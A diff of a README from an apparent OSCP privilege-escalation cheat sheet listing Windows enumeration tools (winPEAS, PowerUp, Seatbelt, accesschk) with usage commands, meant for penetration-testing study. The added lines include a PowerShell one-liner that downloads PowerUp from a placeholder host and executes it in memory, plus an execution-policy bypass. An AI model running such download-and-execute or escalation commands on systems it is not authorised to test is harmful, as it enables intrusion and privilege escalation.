redcountryroad/OSCP-shortsheet/README.md

 ## Tools
 1. [winPEAS](https://github.com/carlospolop/priviledge-escalation-awesome-scripts-suite/tree/master/winPEAS)
 2. [PowerUp](https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1)
-   - Needs to be run from powershell
-   - Searches for specific privilege escalation misconfigurations
+   - `IEX(New-Object Net.Webclient).downloadString('http://x.x.x.x:8000/PowerUp.ps1')`
-   - `powershell -exec bypass`
+   - `powershell -exec bypass` -> `..\PowerUp.ps1` -> `Invoke-AllChecks`
-   - `..\PowerUp.ps1`
-   - `Invoke-AllChecks`
 3. [Seatbelt](https://github.com/GhostPack/Seatbelt)
 4. [accesschk.exe](https://github.com/Andross/oscp/raw/main/accesschk.exe)
+* Checks user access control rights.
+This tools can be used to check wheter a user or group has access to files, directorys, services, and registry keys.
+* You can supply the tool with different usernames to check for:
-5. **check service permissions (Which users can access and with what level of permissions)** `.\accesscheck /accepteula -quvw "C:\This\Is\The\Path"` **check for start stop permission**
+`.\accesscheck /accepteula -uvqc username servicename` **check service permissions (Which users can access and with what level of permissions)** `.\accesscheck /accepteula -quvw "C:\This\Is\The\Path"` **check for start stop permission**
 `.\accesscheck /accepteula -uvqc servicename`